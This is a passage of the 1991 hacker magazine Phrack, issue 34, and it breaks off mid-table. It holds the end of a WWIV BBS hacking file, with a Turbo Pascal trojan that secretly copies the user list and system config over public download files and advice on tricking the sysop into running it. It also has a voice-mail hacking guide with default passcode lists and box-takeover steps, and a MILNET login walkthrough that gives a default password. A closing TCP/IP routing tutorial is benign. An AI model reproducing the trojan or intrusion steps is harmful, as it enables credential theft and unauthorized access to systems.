STUFF.ZIP ""-D It will unzip everything into the proper directory. Voila. The quotation marks are ignored by PKUNZIP and are only there to trip up WWIV v4.20's check for the hyphen. This method can only be defeated by modifying the source code, or taking out the calls to any PKZIP or PKUNZIP programs in INIT, but then you lose your archive section. *** *** Technique #4: The Trojan Horse File-Stealer *** This method, if executed properly, is almost impossible to defeat, and will conceivably work on any BBS program, if you know the directory structure well enough. Once again, you need PC Mag's BAT2EXEC, or enough programming experience to write a program that will copy files from one place to another. The basic principle is this: You get the sysop to run a program that you upload. This program copies \WWIV\DATA\USER.LST and \WWIV\CONFIG.DAT *over* files that already exist in the transfer or gfiles area. You then go download those files and you have the two most important files that exist for WWIV. Now, you need to do a certain amount of guess-work here. WWIV has it's directories set up like this: --- TEMP I --- DIR1 I I I--- DLOADS---I--- DIR2 I I I --- DIR3 WWIV--I--- DATA I --- GDIR1 I I I--- GFILES---I--- GDIR2 I I I --- GDIR3 --- MSGS The sysop sets the names for the DIR1, DIR2, etc. Often you have names like UPLOADS, GAMES, UTILS, etc. For the gfile dirs you might have GENERAL, HUMOR, whatever. So you have to make a guess at the sysop's directory names. Let's say he never moves his files from the upload directory. Then do a directory list from the transfer menu and pick two files that you don't think anyone will download. Let's say you see: RABBIT .ZIP 164k : The History of Rabbits from Europe to the U.S. SCD .COM 12k : SuperCD - changes dirs 3% faster than DOS's CD! So you then might write a batch file like this: @ECHO OFF COPY \WWIV\DATA\USER.LST \WWIV\DLOADS\UPLOADS\RABBIT.ZIP COPY \BBS\DATA\USER.LST \BBS\DLOADS\UPLOADS\RABBIT.ZIP COPY \WWIV\CONFIG.DAT \WWIV\DLOADS\UPLOADS\SCD.COM COPY \BBS\CONFIG.DAT \BBS\DLOADS\UPLOADS\SCD.COM You'd then compile it to a COM file and upload it to the sysop directory. Obviously this file is going to be pretty small, so you have to make up plausible use for it. You could say it's an ANSI screen for your private BBS, and the sysop is invited. This is good if you have a fake account as the president of some big cracking group. You wouldn't believe how gullible some sysops are. At any rate, use your imagination to get him to run the file. And make it sound like he shouldn't distribute it, so he won't put it in some public access directory. There is a problem with simply using a batch file. The output will look like: 1 file(s) copied. File not found. 1 file(s) copied. File not found. That might get him curious enough to look at it with a hex editor, which would probably blow everything. That's why it's better to write a program in your favorite language to do this. Here is a program that searches specified drives and directories for CONFIG.DAT and USER.LST and copies them over the files of your choice. It was written in Turbo Pascal v5.5: Program CopyThisOverThat; { Change the dir names to whatever you want. If you change the number of locations it checks, be sure to change the "num" constants as well } uses dos; const NumMainDirs = 5; MainDirs: array[1..NumMainDirs] of string[8] = ('BBS','WWIV','WORLD', 'BOARD','WAR'); NumGfDirs = 3; GFDirs: array[1..NumGFDirs] of string[8] = ('DLOADS','FILES','UPLOADS'); NumSubGFDirs = 2; SubGFDirs: array[1..NumSubGFDirs] of string[8] = ('UPLOADS','MISC'); NumDirsToTest = 3; DirsToTest: array[1..NumDirsToTest] of string[3] = ('C:\','D:\','E:\'); {ok to test for one that doesn't exist} {Source file names include paths from the MAIN BBS subdir (e.g. "BBS") } SourceFileNames: array[1..2] of string[25] = ('DATA\USER.LST','DATA\CONFIG.DA T'); { Dest file names are from subgfdirs } DestFileNames: array[1..2] of string[12] = ('\BDAY.MOD','\TVK.ZIP'); var p, q, r, x, y, dirN: byte; bigs: word; CurDir, BackDir: string[80]; f1, f2: file; Info: pointer; ok: boolean; Procedure Sorry; var x, y: integer; begin for y := 1 to 1000 do for x := 1 to 100 do ; Writeln; Writeln (''); {change to something like } Writeln; {Abnormal program termination} ChDir(BackDir); Halt; end; begin Write (''); {change to something like } {$I-} {Loading...} GetDir (0, BackDir); ChDir('\'); for dirn := 1 to NumDirsToTest do begin ChDir(DirsToTest[dirn]); if IOResult = 0 then begin for p := 1 to NumMainDirs do begin ChDir (MainDirs[p]); if (IOResult <> 0) then begin if (p = NumMainDirs) and (dirn = NumDirsToTest) then Sorry; end else begin p := NumMainDirs; for q := 1 to NumGFDirs do begin ChDir (GFDirs[q]); if (IOResult <> 0) then begin if (q = NumGFDirs) and (dirn=NumdirsToTest) then Sorry; end else begin q := NumGFDirs; for r := 1 to NumSubGFDirs do begin ChDir (SubGFDirs[r]); if (IOResult <> 0) then begin if r = NumSubGFDirs then Sorry; end else begin r := NumSubGFDirs; dirn := NumDirsToTest; ok := true; end; end; end; end; end; end; end; end; GetDir (0, CurDir); ChDir ('..'); ChDir ('..'); for x := 1 to 2 do begin Assign (f1, SourceFileNames[x]); Assign (f2, CurDir+DestFileNames[x]); Reset (f1, 1); if IOResult <> 0 then begin if x = 2 then Sorry; end else begin ReWrite (f2, 1); Bigs := FileSize(f1); GetMem(Info, Bigs); BlockRead(f1, Info^, Bigs); BlockWrite (f2, Info^, Bigs); FreeMem(Info, Bigs); end; end; Sorry; end. So hopefully the sysop runs this program and emails you with something like "Hey it didn't work bozo!". Or you could make it work. You could actually stick a BBS ad in the program or whatever. It's up to you. At any rate, now you go download those files that it copied the USER.LST and CONFIG.DAT over. You can type out the CONFIG.DAT and the first word you see in all caps is the system password. There are several utilities for WWIV that let you compile the USER.LST to a text file. You can find something like that on a big WWIV board, or you can try to figure it out with a text or hex editor. At any rate, once you have those two files, you're in good shape. You could also use a batch file like that in place of one that calls COMMAND.COM for something like REMOTE.COM. It's up to you. *** *** Hacking Prevention *** So you are the sysop of a WWIV board, and are reading this file with growing dismay. Have no fear, if you have patience, almost all of these methods can be fixed. To eliminate the wildcard upload, all you have to do it get a current copy of WWIV (4.20), and the latest version of DSZ. It's all been fixed. To fix the PKZIP archive hack, simply specify a path in INIT in all calls to PKZIP, PKUNZIP, PKPAK, PKUNPAK, and any other archive programs you have. So your command lines should look like: \DOS\PKZIP -V %1 Or something similar. That will fix that nicely. To eliminate the -D method, you have to make some modifications to the source code if you want to keep your archive section. Goose, sysop of the Twilight Zone BBS in VA, puts out a NOHACK mod, which is updated regularly. It fixes ALL of these methods except the last. The latest version of NOHACK is v2.4. If you are a WWIV sysop, put it in. I can think of two ways to stop the last method, but neither of them are easy, and both require source code modifications. You could keep track of the filesize of a file when it's uploaded. Then when someone goes to download it, you could check the actual filesize with the size when it was uploaded. If they differ, it wouldn't let you download it. You could do the same with the date. Although either method could be gotten around with enough patience. For a virtually unhackable system, voice validate all users, have all uploads go to the sysop directory so you can look over them first, and don't run any programs. Of course, this is very tedious, but that is the price of a secure BBS. *** *** Thanks *** Thanks to Fenris Wolf for teaching me about the -D method, to Steve for help with the CopyThisOverThat program, and to Insight for proofing this file. ******************************************************************************* ==Phrack Inc.== Volume Three, Issue Thirty-four, File #6 of 11 HACKING VOICE MAIL SYSTEMS by Night Ranger DISCLAIMER I, Night Ranger, or anyone else associated with Phrack, am not responsible for anything the readers of this text may do. This file is for informational and educational purposes only and should not be used on any system or network without written permission of the authorized persons in charge. INTRODUCTION I decided to write this text file because I received numerous requests for vmbs from people. Vmbs are quite easy to hack, but if one doesn't know where to start it can be hard. Since there aren't any decent text files on this subject, I couldn't refer them to read anything, and decided to write one myself. To the best of my knowledge, this is the most complete text on hacking vmb systems. If you have any comments or suggestions, please let me know. Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in touch with each other and share information. Probably the main reason for this is their simplicity and availability. Anyone can call a vmb regardless of their location or computer type. Vmbs are easily accessible because most are toll free numbers, unlike bulletin boards. Along with their advantages, they do have their disadvantages. Since they are easily accessible this means not only hackers and phreaks can get information from them, but feds and narcs as well. Often they do not last longer than a week when taken improperly. After reading this file and practicing the methods described, you should be able to hack voice mail systems with ease. With these thoughts in mind, let's get started. FINDING A VMB SYSTEM The first thing you need to do is find a VIRGIN (unhacked) vmb system. If you hack on a system that already has hackers on it, your chance of finding a box is considerably less and it increases the chance that the system administrator will find the hacked boxes. To find a virgin system, you need to SCAN some 800 numbers until you find a vmb. A good idea is to take the number of a voice mail system you know, and scan the same exchange but not close to the number you have. FINDING VALID BOXES ON THE SYSTEM If you get a high quality recording (not an answering machine) then it is probably a vmb system. Try entering the number 100, the recording should stop. If it does not, you may have to enter a special key (such as '*' '#' '8' or '9') to enter the voice mail system. After entering 100 it should either connect you to something or do nothing. If it does nothing, keep entering (0)'s until it does something. Count the number of digits you entered and this will tell you how many digits the boxes on the system are. You should note that many systems can have more than one box length depending on the first number you enter, Eg. Boxes starting with a six can be five digits while boxes starting with a seven can only be four. For this file we will assume you have found a four digit system, which is pretty common. It should do one of the following things... 1) Give you an error message, Eg. 'Mailbox xxxx is invalid.' 2) Ring the extension and then one of the following.. 1) Someone or no one answers. 2) Connects you to a box. 3) Connect you to mailbox xxxx. If you get #1 then try some more numbers. If you get #2 or #3 then you have found a valid vmb (or extension in the case of 2-1). Extensions usually have a vmb for when they are not at their extension. If you get an extension, move on. Where you find one box you will probably find more surrounding it. Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers. Eg. Boxes would be at 105, 116, 121, ... with none in between. Some systems start boxes at either 10 after a round number or 100 after, depending on whether it is a three or four box system. For example, if you do not find any around 100, try 110 and if you do not find any around 1000 try 1100. The only way to be sure is to try EVERY possible box number. This takes time but can be worth it. Once you find a valid box (even if you do not know the passcode) there is a simple trick to use when scanning for boxes outside of a vmb so that it does not disconnect you after three invalid attempts. What you do is try two box numbers and then the third time enter a box number you know is valid. Then abort ( usually by pressing (*) or (#) ) and it will start over again. From there you can keep repeating this until you find a box you can hack on. FINDING THE LOGIN SEQUENCE Different vmb systems have different login sequences (the way the vmb owner gets into his box). The most common way is to hit the pound (#) key from the main menu. This pound method works on most systems, including Aspens (more on specific systems later). It should respond with something like 'Enter your mailbox.' and then 'Enter your passcode.' Some systems have the asterisk (*) key perform this function. Another login method is hitting a special key during the greeting (opening message) of the vmb. On a Cindy or Q Voice Mail system you hit the zero (0) key during the greet and since you've already entered your mailbox number it will respond with 'Enter your passcode.' If (0) doesn't do anything try (#) or (*). These previous two methods of login are the most common, but it is possible some systems will not respond to these commands. If this should happen, keep playing around with it and trying different keys. If for some reason you cannot find the login sequence, then save this system for later and move on. GETTING IN This is where the basic hacking skills come to use. When a system administrator creates a box for someone, they use what's called a default passcode. This same code is used for all the new boxes on the system, and often on other systems too. Once the legitimate owner logs into his new vmb, they are usually prompted to change the passcode, but not everyone realizes that someone will be trying to get into their mailbox and quite a few people leave their box with the default passcode or no passcode at all. You should try ALL the defaults I have listed first. DEFAULTS BOX NUMBER TRY box number (bn) 3234 3234 Most Popular bn backwards 2351 1532 Popular bn+'0' 323 3230 Popular With Aspens Some additional defaults in order of most to least common are: 4d 5d 6d 0000 00000 000000 *MOST POPULAR* 9999 99999 999999 *POPULAR* 1111 11111 111111 *POPULAR* 1234 12345 123456 *VERY POPULAR WITH OWNERS* 4321 54321 654321 6789 56789 456789 9876 98765 987654 2222 22222 222222 3333 33333 333333 4444 44444 444444 5555 55555 555555 6666 66666 666666 7777 77777 777777 8888 88888 888888 1991 It is important to try ALL of these before giving up on a system. If none of these defaults work, try anything you think may be their passcode. Also remember that just because the system can have a four digit passcode the vmb owner does not have to have use all four digits. If you still cannot get into the box, either the box owner has a good passcode or the system uses a different default. In either case, move on to another box. If you seem to be having no luck, then come back to this system later. There are so many vmb systems you should not spend too much time on one hard system. If there's one thing I hate, it's a text file that says 'Hack into the system. Once you get in...' but unlike computer systems, vmb systems really are easy to get into. If you didn't get in, don't give up! Try another system and soon you will be in. I would say that 90% of all voice mail systems have a default listed above. All you have to do is find a box with one of the defaults. ONCE YOU'RE IN The first thing you should do is listen to the messages in the box, if there are any. Take note of the dates the messages were left. If they are more than four weeks old, then it is pretty safe to assume the owner is not using his box. If there are any recent messages on it, you can assume he is currently using his box. NEVER take a box in use. It will be deleted soon, and will alert the system administrator that people are hacking the system. This is the main reason vmb systems either go down, or tighten security. If you take a box that is not being used, it's probable no one will notice for quite a while. SCANNING BOXES FROM THE INSIDE >From the main menu, see if there is an option to either send a message to another user or check receipt of a message. If there is you can search for VIRGIN (unused) boxes) without being disconnected like you would from outside of a box. Virgin boxes have a 'generic' greeting and name. Eg. 'Mailbox xxx' or 'Please leave your message for mailbox xxx...' Write down any boxes you find with a generic greeting or name, because they will probably have the default passcode. Another sign of a virgin box is a name or greeting like 'This mailbox is for ...' or a women's voice saying a man's name and vice versa, which is the system administrator's voice. If the box does not have this feature, simply use the previous method of scanning boxes from the outside. For an example of interior scanning, when inside an Aspen box, chose (3) from the main menu to check for receipt. It will respond with 'Enter box number.' It is a good idea to start at a location you know there are boxes present and scan consecutively, noting any boxes with a 'generic' greeting. If you enter an invalid box it will alert you and allow you to enter another. You can enter invalid box numbers forever, instead of the usual three incorrect attempts from outside a box. TAKING A BOX Now you need to find a box you can take over. NEVER take a box in use; it simply won't last. Deserted boxes (with messages from months ago) are the best and last the longest. Take these first. New boxes have a chance of lasting, but if the person for whom the box was created tries to login, you'll probably lose it. If you find a box with the system administrator's voice saying either the greeting or name (quite common), keeping it that way will prolong the box life, especially the name. This is the most important step in taking over a box! Once you pick a box take over, watch it for at least three days BEFORE changing anything! Once you think it's not in use, then change only the passcode, nothing else! Then login frequently for two to three days to monitor the box and make sure no one is leaving messages in it. Once you are pretty sure it is deserted, change your greeting to something like 'Sorry I'm not in right now, please leave your name and number and I'll get back to you.' DO NOT say 'This is Night Ranger dudes...' because if someone hears that it's good as gone. Keep your generic greeting for one week. After that week, if there are no messages from legitimate people, you can make your greeting say whatever you want. The whole process of getting a good vmb (that will last) takes about 7-10 days, the more time you take the better chance you have of keeping it for long time. If you take it over as soon as you get in, it'll probably last you less than a week. If you follow these instructions, chances are it will last for months. When you take some boxes, do not take too many at one time. You may need some to scan from later. Plus listening to the messages of the legitimate users can supply you with needed information, such as the company's name, type of company, security measures, etc. SYSTEM IDENTIFICATION After you have become familiar with various systems, you will recognize them by their characteristic female (or male) voice and will know what defaults are most common and what tricks you can use. The following is a few of a few popular vmb systems. ASPEN is one of the best vmb systems with the most features. Many of them will allow you to have two greetings (a regular and an extended absence greeting), guest accounts, urgent or regular messages, and numerous other features. Aspens are easy to recognize because the female voice is very annoying and often identifies herself as Aspen. When you dial up an Aspen system, sometimes you have to enter an (*) to get into the vmb system. Once you're in you hit (#) to login. The system will respond with 'Mailbox number please?' If you enter an invalid mailbox the first time it will say 'Mailbox xxx is invalid...' and the second time it will say 'You dialed xxx, there is no such number...' and after a third incorrect entry it will hang up. If you enter a valid box, it will say the box owner's name and 'Please enter your passcode.' The most common default for Aspens is either box number or box number + (0). You only get three attempts to enter a correct box number and then three attempts to enter a correct passcode until it will disconnect you. From the main menu of an Aspen box you can enter (3) to scan for other boxes so you won't be hung up like you would from outside the box. CINDY is another popular system. The system will start by saying 'Good Morning/Afternoon/Evening. Please enter the mailbox number you wish...' and is easy to identify. After three invalid box entries the system will say 'Good Day/Evening!' and hang up. To login, enter the box number and during the greet press (0) then your passcode. The default for ALL Cindy systems is (0). From the main menu you can enter (6) to scan for other boxes so you won't be hung up. Cindy voice mail systems also have a guest feature, like Aspens. You can make a guest account for someone, and give them password, and leave them messages. To access their guest account, they just login as you would except they enter their guest passcode. Cindy systems also have a feature where you can have it call a particular number and deliver a recorded message. However, I have yet to get this feature to work on any Cindy boxes that I have. MESSAGE CENTER is also very popular, especially with direct dials. To login on a Message Center, hit the (*) key during the greet and the system will respond with 'Hello . Please enter your passcode.' These vmbs are very tricky with their passcode methods. The first trick is when you enter an invalid passcode it will stop you one digit AFTER the maximum passcode length. Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter the fifth digit, that means the system uses a four digit passcode, which is most common on Message Centers. The second trick is that if you enter an invalid code the first time, no matter what you enter as the second passcode it will give you an error message and ask again. Then if you entered the correct passcode the second and third time it will let you login. Also, most Message Centers do not have a default, instead the new boxes are 'open' and when you hit (*) it will let you in. After hitting (*) the first time to login a box you can hit (*) again and it will say 'Welcome to the Message Center.' and from there you can dial other extensions. This last feature can be useful for scanning outside a box. To find a new box, just keep entering box numbers and hitting (*) to login. If it doesn't say something to the effect of welcome to your new mailbox then just hit (*) again and it will send you back to the main system so you can enter another box. This way you will not be disconnected. Once you find a box, you can enter (6) 'M'ake a message to scan for other boxes with generic names. After hitting (6) it will ask for a mailbox number. You can keep entering mailbox numbers until you find a generic one. Then you can cancel your message and go hack it out. Q VOICE MAIL is a rather nice system but not as common. It identifies itself 'Welcome to Q Voice Mail Paging' so there is no question about what system it is. The box numbers are usually five digits and to login you enter (0) like a Cindy system. From the main menu you can enter (3) to scan other boxes. There are many more systems I recognize but do not know the name for them. You will become familiar with these systems too. CONCLUSION You can use someone else's vmb system to practice the methods outlined above, but if you want a box that will last you need to scan out a virgin system. If you did everything above and could not get a vmb, try again on another system. If you follow everything correctly, I guarantee you will have more vmbs than you know what to do with. When you start getting a lot of them, if you are having trouble, or just want to say hi be sure to drop me a line on either of my internet addresses, or leave me a voice mail message. NOTE: Some information was purposely not included in this file to prevent abuse to various systems. Night Ranger gbatson@clutx.clarkson.edu 1-800-666-2336 Box 602 (After Business Hours) 1-800-435-2008 Box 896 (After Business Hours) _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-four, File #7 of 11 _____________________________________ | | | : : : : : : : : : : : : : : : : : | | : Brigadier General Swipe : | | : : : : : : : : : : : : : : : : : | | | | presents: | _____________________________________ | | | An Introduction to MILNET | | | |_____________________________________| : :Introduction: : First of all MILNET is a system used by branches of the military for unclassified communications. MILNET produces that infamous TAC login xxx. TAC MILNET is run out of the University of Southern California. USC is the ISI master dial up. I would also like to point out that the Department of Defense tends to frown on people browsing through there system. With that in mind, here is a basic overview of MILNET operations. : :Logging On: : MILNET can be reached over through the "nets" or can be directly connected to by dialing 1-800-368-2217 or 213-306-1366. The later is the ISI master dial up. Most military bases connect through the 800 dial up owned by AT&T. ISIE MASTER LOGON PROCEDURE ---------------------------- 1> call 213-306-1366 2> when the phone stops ringing you are connected 3> enter location number (9 digits) + 1 or 0 4> hang up and it will call you 5> pick up the phone and hit the '*' on your phone 6> hit a carriage return on the computer 7> at the 'what class?' prompt hit RETURN 8> then a 'go' prompt will appear and log on as you would the 800 number. MILNET LOGIN PROCEDURE ----------------------- > When you first connect you will see: 'WELCOME TO DDN. FOR OFFICIAL USE ONLY.TAC LOGIN CALL NIC 1-800-235-3155 FOR HELP WRPAT TAC 113 #:36 > the person logging on types: @o 1/103 YOU ALWAYS TYPE @o then other connections are: ISIA 3/103 ISIB 10:3/52 ISID 10:0/27 ISIE 1/103 (THE EXAMPLE) ISIF 2/103 VAX A 10:2/27 > Next you will see a 'USER-ID' prompt. The first 4 characters vary but it is is always followed by a '-' and what ever connection you choose. User-Id: (example) CER5-ISIE or MRW1-ISIE > The first three letters are the initials of the user followed by a random number (1-9). Access Code: (example) 2285UNG6A or 22L8KK5CH > An access code will never contain a ( 1, 0, G, Z). @ USERNAME + PASSWORD IE USERNAME SAC.512AREFW-LGTO THE USERNAME EXPLANATION: ------------------------- The first 3 letters in the example given above are SAC. This stands for Strategic Air Command, a branch of the Air Force. Following that is a "." Then the unit number and the prime mission. In this case 512AREFW", (512th AIR REFUELING WING). Then a '-' and the Individual Squadron name 'LGTO' (LOGISTICS GROUND TRANSPORTATION OPERATIONS), a fancy name for the motor pool. The password will not be echoed back and should be entered after the username. The new user password as a default is: NEW-UZER-ACNT. : :Options: : PROGRAMS AVAILABLE TO SAC USERS: ------------------------------- ADUTY aids in management of additional duty assignments. (International help - use the ? and keys, HELP.) ARCHIVE requests files to be stored on tape for later retrieval. (Type HELP ARCHIVE at TOPS-20.) CHAT Provides near real time communication between terminal users on the same host computer. (Use ? with CHAT.) DAILY Executive appointment scheduling program DCOPY Handles output on DIABLO and XEROX printers EMACS Powerful full-screen text editor FOLLOW Suspense follow up program FTP provides file transfer capabilities between host computers FKEYS allows user to define function key (real spiffaruni) HELP the command used by stupid generals or hackers that have never used milnet before HERMES E-Mail NCPCALC spreadsheet program PHOTO saves transcripts of sessions REMIND sends user-created reminders RIPSORT a sophisticated data sorting program (Described in SAC's User manual (sorry)) SCRIBE a powerful text formatter for preparing documents. (ISI's manual, SCRIBE manual - soon on MILNET V.2) SPELL text file spelling checker. (HELP at TOPS-20 and directory international help -?) SUSCON allows the creating, sending, and clearing of suspenses. (international help - ? and , HELP command) TACOPY used for printing hard copies of files (international help - ?) TALK pretty much the same as chat. TIPCOPY predecessor of TACOPY TEACH-EMACS (SELF EXPLANATORY: GIVES LIST OF COMMANDS) TN Tel-Net provides multi-host access on MILNET. (HELP at TOPS-20 and directory, international help - use ? and ) XED line oriented text editor. (HELP at TOPS-20 and directory) : :Logging Out: : TYPE: @L : :ID Card: : When a user gets a MILNET account he/she receives a card in the mail that looks similar to the diagram below. It is credit card sized and will be blue & white. _______________________________________ / \ | HOST USC-ISIE 26.1.0.103 | | HOST ADMINISTRATOR GORDON,VICKI L. | |---------------------------------------| | DDN CARD HOLDER: | | SMITH, BILL A, 1st LT. | | CARD 418475 | |---------------------------------------| | USER ID:CER5-ISIE | | ACCESS CODE:2285ANI6A | | USERNAME: SAC.512AREFW-LGTO | | PASSWORD: NEW-UZER-ACNT | \_______________________________________/ _______________________________________________________________________________ : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-Four, File #8 of 11 A TCP/IP Tutorial : Behind The Internet Part Two of Two October 4th, 1991 Presented by The Not 5. Internet Protocol The IP module is central to internet technology and the essence of IP is its route table. IP uses this in-memory table to make all decisions about routing an IP packet. The content of the route table is defined by the network administrator. Mistakes block communication. To understand how a route table is used is to understand internetworking. This understanding is necessary for the successful administration and maintenance of an IP network. The route table is best understood by first having an overview of routing, then learing about IP network addresses, and then looking at the details. 5.1 Direct Routing The figure below is of a tiny internet with 3 computers: A, B, and C. Each computer has the same TCP/IP protocol stack as in Figure 1. Each computer's Ethernet interface has its own Ethernet address. Each computer has an IP address assigned to the IP interface by the network manager, who also has assigned an IP network number to the Ethernet. A B C | | | --o------o------o-- Ethernet 1 IP network "development" Figure 6. One IP Network When A sends an IP packet to B, the IP header contains A's IP address as the source IP address, and the Ethernet header contains A's Ethernet address as the source Ethernet address. Also, the IP header contains B's IP address as the destination IP address and the Ethernet header contains B's Ethernet address as the des ---------------------------------------- |address source destination| ---------------------------------------- |IP header A B | |Ethernet header A B | ---------------------------------------- TABLE 5. Addresses in an Ethernet frame for an IP packet from A to B For this simple case, IP is overhead because the IP adds little to the service offered by Ethernet. However, IP does add cost: the extra CPU processing and network bandwidth to generate, transmit, and parse the IP header. When B's IP module receives the IP packet from A, it checks the destination IP address against its own, looking for a match, then it passes the datagram to the upper-level protocol. This communication between A and B uses direct routing. 5.2 Indirect Routing The figure below is a more realistic view of an internet. It is composed of 3 Ethernets and 3 IP networks connected by an IP-router called computer D. Each IP network has 4 computers; each computer has its own IP address and Ethernet address. A B C ----D---- E F G | | | | | | | | | --o------o------o------o- | -o------o------o------o-- Ethernet 1 | Ethernet 2 IP network "development" | IP network "accounting" | | | H I J | | | | --o-----o------o------o-- Ethernet 3 IP network "factory" Figure 7. Three IP Networks; One internet Except for computer D, each computer has a TCP/IP protocol stack like that in Figure 1. Computer D is the IP-router; it is connected to all 3 networks and therefore has 3 IP addresses and 3 Ethernet addresses. Computer D has a TCP/IP protocol stack similar to that in Figure 3, except that it has 3 ARP modules and 3 Ethernet drivers instead of 2. Please note that computer D has only one IP module. The network manager has assigned a unique number, called an IP network number, to each of the Ethernets. The IP network numbers are not shown in this diagram, just the network names. When computer A sends an IP packet to computer B, the process is identical to the single network example above. Any communication between computers located on a single IP network matches the direct routing example discussed previously. When computer D and A communicate, it is direct communication. When computer D and E communicate, it is direct communication. When computer D and H communicate, it is direct communication. This is because each of these pairs of computers is on the same IP network. However, when computer A communicates with a computer on the far side of the IP-router, communication is no longer direct. A must use D to forward the IP packet to the next IP network. This communication is called "indirect". This routing of IP packets is done by IP modules and happens transparently to TCP, UDP, and the network applications. If A sends an IP packet to E, the source IP address and the source Ethernet address are A's. The destination IP address is E's, but because A's IP module sends the IP packet to D for forwarding, the destination Ethernet address is D's. ---------------------------------------- |address source destination| ---------------------------------------- |IP header A E | |Ethernet header A D | ---------------------------------------- TABLE 6. Addresses in an Ethernet frame for an IP packet from A to E (before D) D's IP module receives the IP packet and upon examining the destination IP address, says "This is not my IP address," and sends the IP packet directly to E. ---------------------------------------- |address source destination| ---------------------------------------- |IP header A E | |Ethernet header D E | ---------------------------------------- TABLE 7. Addresses in an Ethernet frame for an IP packet from A to E (after D) In summary, for direct communication, both the source IP address and the source Ethernet address is the sender's, and the destination IP address and the destination Ethernet addrss is the recipient's. For indirect communication, the IP address and Ethernet addresses do not pair up in this way. This example internet is a very simple one. Real networks are often complicated by many factors, resulting in multiple IP-routers and several types of physical networks. This example internet might have come about because the network manager wanted to split a large Ethernet in order to localize Ethernet broadcast traffic. 5.3 IP Module Routing Rules This overview of routing has shown what happens, but not how it happens. Now let's examine the rules, or algorithm, used by the IP module. For an outgoing IP packet, entering IP from an upper layer, IP must decide whether to send the IP packet directly or indirectly, and IP must choose a lower network interface. These choices are made by consulting the route table. For an incoming IP packet, entering IP from a lower interface, IP must decide whether to forward the IP packet or pass it to an upper layer. If the IP packet is being forwarded, it is treated as an outgoing IP packet. When an incoming IP packet arrives it is never forwarded back out through the same network interface. These decisions are made before the IP packet is handed to the lower interface and before the ARP table is consulted. 5.4 IP Address The network manager assigns IP addresses to computers according to the IP network to which the computer is attached. One part of a 4- byte IP address is the IP network number, the other part is the IP computer number (or host number). For the computer in table 1, with an IP address of 223.1.2.1, the network number is 223.1.2 and the host number is number 1. The portion of the address that is used for network number and for host number is defined by the upper bits in the 4-byte address. All example IP addresses in this tutorial are of type class C, meaning that the upper 3 bits indicate that 21 bits are the network number and 8 bits are the host number. This allows 2,097,152 class C networks up to 254 hosts on each network. The IP address space is administered by the NIC (Network Information Center). All internets that are connected to the single world-wide Internet must use network numbers assigned by the NIC. If you are setting up your own internet and you are not intending to connect it to the Internet, you should still obtain your network numbers from the NIC. If you pick your own number, you run the risk of confusion and chaos in the eventuality that your internet is connected to another internet. 5.5 Names People refer to computers by names, not numbers. A computer called alpha might have the IP address of 223.1.2.1. For small networks, this name-to-address translation data is often kept on each computer in the "hosts" file. For larger networks, this translation data file is stored on a server and accessed across the network when needed. A few lines from that file might look like this: 223.1.2.1 alpha 223.1.2.2 beta 223.1.2.3 gamma 223.1.2.4 delta 223.1.3.2 epsilon 223.1.4.2 iota The IP address is the first column and the computer name is the second column. In most cases, you can install identical "hosts" files on all computers. You may notice that "delta" has only one entry in this file even though it has 3 IP addresses. Delta can be reached with any of its IP addresses; it does not matter which one is used. When delta receives an IP packet and looks at the destination address, it will recognize any of its own IP addresses. IP networks are also given names. If you have 3 IP networks, your "networks" file for documenting these names might look something like this: 223.1.2 development 223.1.3 accounting 223.1.4 factory The IP network number is in the first column and its name is in the second column. From this example you can see that alpha is computer number 1 on the development network, beta is computer number 2 on the development network and so on. You might also say that alpha is development.1, Beta is development.2, and so on. The above hosts file is adequate for the users, but the network manager will probably replace the line for delta with: 223.1.2.4 devnetrouter delta 223.1.3.1 facnetrouter 223.1.4.1 accnetrouter These three new lines for the hosts file give each of delta's IP addresses a meaningful name. In fact, the first IP address listed has 2 names; "delta" and "devnetrouter" are synonyms. In practice "delta" is the general-purpose name of the computer and the other 3 names are only used when administering the IP route table. These files are used by network administration commands and network applications to provide meaningful names. They are not required for operation of an internet, but they do make it easier for us. 5.6 IP Route Table How does IP know which lower network interface to use when sending out a IP packet? IP looks it up in the route table using a search key of the IP network number extracted from the IP destination address. The route table contains one row for each route. The primary columns in the route table are: IP network number, direct/indirect flag, router IP address, and interface number. This table is referred to by IP for each outgoing IP packet. On most computers the route table can be modified with the "route" command. The content of the route table is defined by the network manager, because the network manager assigns the IP addresses to the computers. 5.7 Direct Routing Details To explain how it is used, let us visit in detail the routing situations we have reviewed previously. --------- --------- | alpha | | beta | | 1 | | 1 | --------- --------- | | --------o---------------o- Ethernet 1 IP network "development" Figure 8. Close-up View of One IP Network The route table inside alpha looks like this: -------------------------------------------------------------- |network direct/indirect flag router interface number| -------------------------------------------------------------- |development direct 1 | -------------------------------------------------------------- TABLE 8. Example Simple Route Table This view can be seen on some UNIX systems with the "netstat -r" command. With this simple network, all computers have identical routing tables. For discussion, the table is printed again without the network number translated to its network name. -------------------------------------------------------------- |network direct/indirect flag router interface number| -------------------------------------------------------------- |223.1.2 direct 1 | -------------------------------------------------------------- TABLE 9. Example Simple Route Table with Numbers 5.8 Direct Scenario Alpha is sending an IP packet to beta. The IP packet is in alpha's IP module and the destination IP address is beta or 223.1.2.2. IP extracts the network portion of this IP address and scans the first column of the table looking for a match. With this network a match is found on the first entry. The other information in this entry indicates that computers on this network can be reached directly through interface number 1. An ARP table translation is done on beta's IP address then the Ethernet frame is sent directly to beta via interface number 1. If an application tries to send data to an IP address that is not on the development network, IP will be unable to find a match in the route table. IP then discards the IP packet. Some computers provide a "Network not reachable" error message. 5.9 Indirect Routing Details Now, let's take a closer look at the more complicated routing scenario that we examined previously. --------- --------- --------- | alpha | | delta | |epsilon| | 1 | |1 2 3| | 1 | --------- --------- --------- | | | | | --------o---------------o- | -o----------------o-------- Ethernet 1 | Ethernet 2 IP network "Development" | IP network "accounting" | | -------- | | iota | | | 1 | | -------- | | --o--------o-------- Ethernet 3 IP network "factory" Figure 9. Close-up View of Three IP Networks The route table inside alpha looks like this: --------------------------------------------------------------------- |network direct/indirect flag router interface number| --------------------------------------------------------------------- |development direct 1 | |accounting indirect devnetrouter 1 | |factory indirect devnetrouter 1 | -------------------------------------------------------------------- TABLE 10. Alpha Route Table For discussion the table is printed again using numbers instead of names. -------------------------------------------------------------------- |network direct/indirect flag router interface number| -------------------------------------------------------------------- 